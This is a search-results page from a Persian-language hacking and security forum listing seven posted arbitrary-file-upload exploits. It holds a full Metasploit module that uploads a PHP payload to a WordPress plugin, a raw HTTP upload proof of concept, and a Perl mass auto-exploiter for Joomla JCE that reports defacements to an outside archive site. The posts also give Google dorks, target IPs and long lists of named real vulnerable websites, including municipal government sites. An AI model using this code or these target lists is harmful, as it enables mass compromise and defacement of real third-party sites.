رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'arbitrary'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

49 نتیجه پیدا شد

  1. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arash Khazaei', # EDB PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'EDB', '37998' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Responsive Thumbnail Slider Plugin v1.0', { } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 28 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]), OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ]) ]) end def check # The version regex found in extract_and_check_version does not work for this plugin's # readme.txt, so we build a custom one. check_code = check_version || check_plugin_path if check_code return check_code else return CheckCode::Safe end end def check_version plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.body && res.body =~ /Version:([\d\.]+)/ version = Gem::Version.new($1) if version <= Gem::Version.new('1.0') vprint_status("Plugin version found: #{version}") return CheckCode::Appears end end nil end def check_plugin_path plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.code == 200 vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected') return CheckCode::Detected end nil end def login auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD']) return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies) print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}") auth_cookies end def upload_payload(cookies) manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management' file_payload = get_write_exec_payload(:unlink_self => true) file_name = "#{rand_text_alpha(5)}.php" # attempt to access plugins page plugin_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies ) unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page") end data = Rex::MIME::Message.new data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"") data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"") data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"") post_data = data.to_s # upload the file upload_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies) fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/) retrieve_file(page, cookies) end def retrieve_file(res, cookies) fname = res.body.scan(/slider\/(.*\.php)/).flatten[0] fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil? file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") print_good("Successful upload") send_request_cgi( 'uri' => file_uri, 'method' => 'GET', 'cookie' => cookies ) end def exploit unless check == CheckCode::Safe auth_cookies = login upload_payload(auth_cookies) end end end
  2. # Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=1 # # http://localhost/[PATH]/upload/[FILE] POST /[PATH]/docs_upload.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/[PATH]/docs_manage.php?id=1 Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive Content-Type: multipart/form-data; boundary= ---------------------------158943328914318561992147220435 Content-Length: 721 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php" Content-Type: application/force-download <?php phpinfo(); ?> -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="submit" Upload File -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="id" 1 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="version" -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="hasdocs" -----------------------------158943328914318561992147220435-- HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:24:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1783 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <html> <body> <form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data"> Select document to upload: <input name="fileToUpload" id="fileToUpload" type="file"> <input value="Ver Ayari" name="submit" type="submit"> <input value="1" name="id" type="hidden"> <input value="1'" name="version" type="hidden"> <input value="1" name="hasdocs" type="hidden"> </form> </body> </html>
  3. # Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability # Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage => mediatechindonesia.com # Google Dork => All rights reserved. © 2015 Media Tech Indonesia # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018050180 # Cyberizm : cyberizm.org/cyberizm-indo-cardealer-mediatech-tinymcpuk-filemanager-exploit.html ################################################################################# Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm Please upload your file as => /yourfilename.htm.fla Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla ################################################################################# Example Sites and Target IP => 103.27.206.203 daihatsusidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash toyotaterpercaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promosidoarjodaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotasidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotajatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash salestoyotagresik.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash saleshondasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash swalayanrak.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukiwarusurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukiumcsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukisbtsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukisbtmalang.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimurahsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimobilsurabaya.net/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimobilsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash surabayadaihatsu.info/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash surabayadaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash umcsuzukipasuruan.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash umcsuzukijatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash Example Mirror [ Proof of Concept ] => zone-h.org/mirror/id/31184406 ################################################################################# Discovered By : KingSkrupellos from Cyberizm.Org #################################################################################
  4. # Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage : joomlacontenteditor.net # Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/ # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200 # Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html ################################################################################# Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter Google Dork [ Example ] => inurl:''/index.php?option=com_jce'' You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain. Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... Office-like functions and familiar buttons make formatting simple Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser Easily tab between WYSIWYG, Code and Preview modes. Create Tables, edit Styles, format text and more... Integrated Spellchecking using your browser's Spellchecker Fine-grained control over the editor layout and features with Editor Profiles Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio. Easily insert Youtube and Vimeo videos - just paste in the URL and Insert! Insert HTML5 Video and Audio with multiple source options Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor Insert multiple images. Create responsive images with the srcset attribute Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension Filemanager => Create links to images, documents, media and other common file types Include a file type icon, file size and modified date Insert as a link or embed the document with an iframe Create downloadable files using the download attribute. Template Manager => Insert pre-defined template content form html or text files Create template snippet files from whole articles or selected content Configure the Template Manager to set the startup content of new articles ################################################################################# Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. The component is prone to a the following security vulnerabilities: 1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script. 2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Affected JCE 2.1.0 is vulnerable; other versions may also be affected. References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481 References => https://www.securityfocus.com/bid/53630 Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT This JCE is well-known by some hackers but some hackers do not know about nothing about this vulnerability. So this is the new one. TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png ################################################################################# Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg An Attacker cannot reach this image manager without username and password on the control panel. But there is a little trick to upload a image or a file behind this vulnerability. One Attacker must execute with remote file upload code. Watch Videos from Original Sources => Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video] Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video] How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video] ################################################################################# You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors. Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 {"result":{"error":true,"result":""},"error":null} Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload or giving this error => {"result":null,"error":"No function call specified!"} Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":null,"error":"No function call specified!"} Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt ################################################################################# Auto Mass Exploiter Perl => [code]#!/usr/bin/perl use Term::ANSIColor; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); $ua->timeout (10); system('title JCE Mass Auto Exploiter by KingSkrupellos'); print "JCE Mass Auto Exploiter\n"; print "Coded by KingSkrupellos\n"; print "Cyberizm Digital Security Team\n"; print "Sitelerin Listesi Reyis:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; foreach $site(@TARGETS){ chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"; print "wait upload $site\n"; $vulnurl=$site.$exploiturl; $res = $ua->get($vulnurl)->content; if ($res =~ m/No function call specified!/i){ open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt'); print "\n[Uploading]"; my $res = $ua->post($vulnurl, Content_Type => 'form-data', Content => [ 'upload-dir' => './../../', 'upload-overwrite' => 0, 'Filedata' => ["kingskrupellos.png"], 'action' => 'upload' ] )->decoded_content; if ($res =~ m/"error":false/i){ }else{ print " ......... "; print color('bold white'); print "["; print color('reset'); print color('bold green'); print "PATCHED"; print color('reset'); print color('bold white'); print "] \n"; print color('reset'); } $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> ); $def= "$site/kingskrupellos.png"; print colored ("[+]Basarili",'white on_red'),"\n"; print "$site/kingskrupellos.png\n"; }else{ print colored (">>Exploit Olmadi<<",'white on_blue'),"\n"; } } sub zonpost{ $req = HTTP::Request->new(GET=>$link); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); $ar = $response->content; if ($ar =~ /Hacked By KingSkrupellos/){ $dmn= $link; $def="KingSkrupellos"; $zn="http://aljyyosh.org/single.php"; $lwp=LWP::UserAgent->new; $res=$lwp -> post($zn,[ 'defacer' => $def, 'domain1' => $dmn, 'hackmode' => '15', 'reason' => '1', 'Gönder' => 'Send', ]); if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { print colored ("[-]Gönder $1",'white on_green'),"\n"; } else { print colored ("[-]Hata",'black on_white'),"\n"; } }else{ print" Zone Alınmadı !! \n"; } }[/code] How to use this code on your operating system like Windows ; Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it. Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt C:/Users/Your-Computer-Name/ cd Desktop cd "jcee" perl yourexploitcodenamejce.pl site.txt Waiting for Upload Exploit Successful or Not Finished # Uploaded File/Image Directory Path => TARGETDOMAIN/yourfilename.png .jpg .gif TARGETDOMAIN/images/yourfilename.png .jpg .gif ################################################################################# Example Vulnerable Sites => aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":{"error":true,"result":""},"error":null} => [ Proof of Concept ] => archive.is/J2eX0 => archive.is/YFanj sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} irm.edu.vn/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload pigpilot.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload deep-centr.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload wintotal.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload restaurante-chines.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload artlife54.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload litekstent.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload artstairs.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload telltale.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload zivapodstran.cz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload littlefolkvisuals.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload practicsa.ro/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload tis.co.th/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload newconcept-cleaning.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload basolatogucciardi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload finansure.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload kansystem.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload comtec.rs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload esmikom.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload farmacovigilanza-online.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload djgonis.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload diktatura.lt/main/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload despachosdigitales.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload gebaeudereinigung-pesch.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload jeddah4arch.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload swmoveisplanejados.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload psychologie.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload rolsteigerkopen.nl/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload studiocontabilecapuana.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload traversatacarnica.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload arcade-sages-femmes.ch/asf/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload alamoconsulting.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload asociacionchajulense.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload caseyfiliaci.com/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload dermedica.biz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload custer.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload gimsusz.pl/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload guayab.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload physiotherapie-wenus.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload quintasaojoao.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload ocetehnotrade.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload psxm-tkdm.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload confatech.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload jeffcole.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload cabanascamilo.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload thesurelink.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload oddjobthesailor.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload linalux-montlesoie.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload mgsopop.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload pascal-it.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload sicurservice.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload balzamcda.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload diaocsontra.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload juergenlagger.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload johnmcfaddenattorney.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload spacious.com.tw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload kims-ltd.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload percyparkminis.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload THE END ################################################################################# Discovered By KingSkrupellos from Cyberizm Digital Security Team #################################################################################
  5. # Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz # Google Dorks : intext:''Copyright © 2008 www.univex.cz'' intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060297 ################################################################################################# # Exploit : TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html # Path : TARGET/files/.... ################################################################################################# # Example Vulnerable Sites : designbaterie.cz/fckeditor/editor/filemanager/connectors/uploadtest.html letbalonem-darek.cz/fckeditor/editor/filemanager/connectors/uploadtest.html strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html krakonosuv-antikvariat.cz/fckeditor/editor/filemanager/connectors/uploadtest.html iventilatory.cz/fckeditor/editor/filemanager/connectors/uploadtest.html strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html jn-models.cz/fckeditor/editor/filemanager/connectors/uploadtest.html ardewo.cz/eshop/fckeditor/editor/filemanager/connectors/uploadtest.html chalupaholubov.cz/fckeditor/editor/filemanager/connectors/uploadtest.html seftrade.cz/fckeditor/editor/filemanager/connectors/uploadtest.html ################################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  6. # Exploit Title : Drupal PaisDigital ArgentinaGov Municipality ContactForm Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 01/06/2018 # Vendor Homepage : argentina.gob.ar/paisdigital # Tested On : Windows # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060021 ################################################################################################# # Google Dork 1 : inurl:''/?q=contacto'' site:gob.ar # Google Dork 2 : intext:''Los archivos deben ser menores que 2 MB.'' site:gob.ar # Google Dork 3 : intext:''Tipos de archivo permitidos: gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.'' site:gob.ar # Exploit : /?q=contacto # Path : /sites/default/files/webform/.... # Notes => Allowed File Extensions : gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx. ################################################################################################# # Target IP Address => 186.33.254.182 # Example Vulnerable Sites => municipalidaddeaguascalientes.gob.ar/?q=contacto [ Proof of Concept ] => archive.is/d8GHu => archive.is/QTpnS pellegrini.gov.ar magdalena.gob.ar marull.gob.ar pampablanca.gob.ar municipalidaddeabrapampa.gob.ar saladillo.gob.ar lasflores.gob.ar municipalidaddearrayanal.gob.ar palmasola.gob.ar frailepintado.gob.ar rinconada.gob.ar montedelosgauchos.gob.ar trescruces.gob.ar generallavalle.gob.ar vinalito.gob.ar puestoviejo.gob.ar balcarce.gob.ar ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  7. # Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/06/2018 # Vendor Homepage : regione.toscana.it - jquery.com # Tested On : Windows # Version : 7 # Category : WebApps # Exploit Risk : Medium # CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060240 ################################################################################################# # Google Dorks : intext:''Scrivi al Comune'' site:fi.it Il testo del tuo messaggio * site:fi.it # Exploits : /scrivi-al-comune /scrivi-al-comune-0 /segnalazioni-e-reclami-0 /scrivi-al-sindaco-0 /node/19 # Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/..... # Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx. # Don't forget to put www. before comune. on the URL Address bar. ################################################################################################# # Example Vulnerable Sites and Target IP => 159.213.236.225 [ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH www.comune.vicchio.fi.it/segnalazioni-e-reclami-0 www.comunebarberino.it/scrivi-al-comune 